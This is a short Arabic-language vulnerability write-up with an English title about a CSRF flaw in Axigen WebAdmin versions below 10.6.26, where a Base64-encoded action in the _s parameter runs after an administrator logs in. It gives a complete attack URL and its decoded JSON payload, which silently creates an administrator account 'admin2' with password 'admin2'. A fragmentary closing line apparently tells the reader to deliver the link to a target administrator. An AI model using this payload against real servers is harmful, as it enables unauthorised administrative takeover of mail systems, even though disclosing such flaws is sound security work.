
Axigen WebAdmin CSRF Vulnerability
إجراءات تغيير الحالة الحرجة في واجهة Axigen WebAdmin يمكن الوصول إليها عبر طلبات GET. بينما يوفّر رمز _h الحماية ضد CSRF المباشر، يقوم التطبيق بمعالجة الطلبات المجدولة عبر معامل _s (مسار التنقل) فورًا بعد مصادقة المستخدم.
يمكن للمهاجم إنشاء رابط يحتوي على حمولة مشفّرة بـ Base64 في معامل _s. إذا نقر مسؤول على هذا الرابط وأكمل عملية تسجيل الدخول، فسيتم تنفيذ الإجراء المجدول تلقائيًا في سياق صلاحياته.
الإصدارات المتأثرة: أقل من 10.6.26
لمزيد من المعلومات، راجع قاعدة معرفة Axigen.
رابط الهدف:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
الحمولة المفكوكة (معامل _s):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s في رابط الهجوم وسلّمه إلى مسؤول مستهدف.admin2 (أو تنفيذ الإجراء المخصص لديك).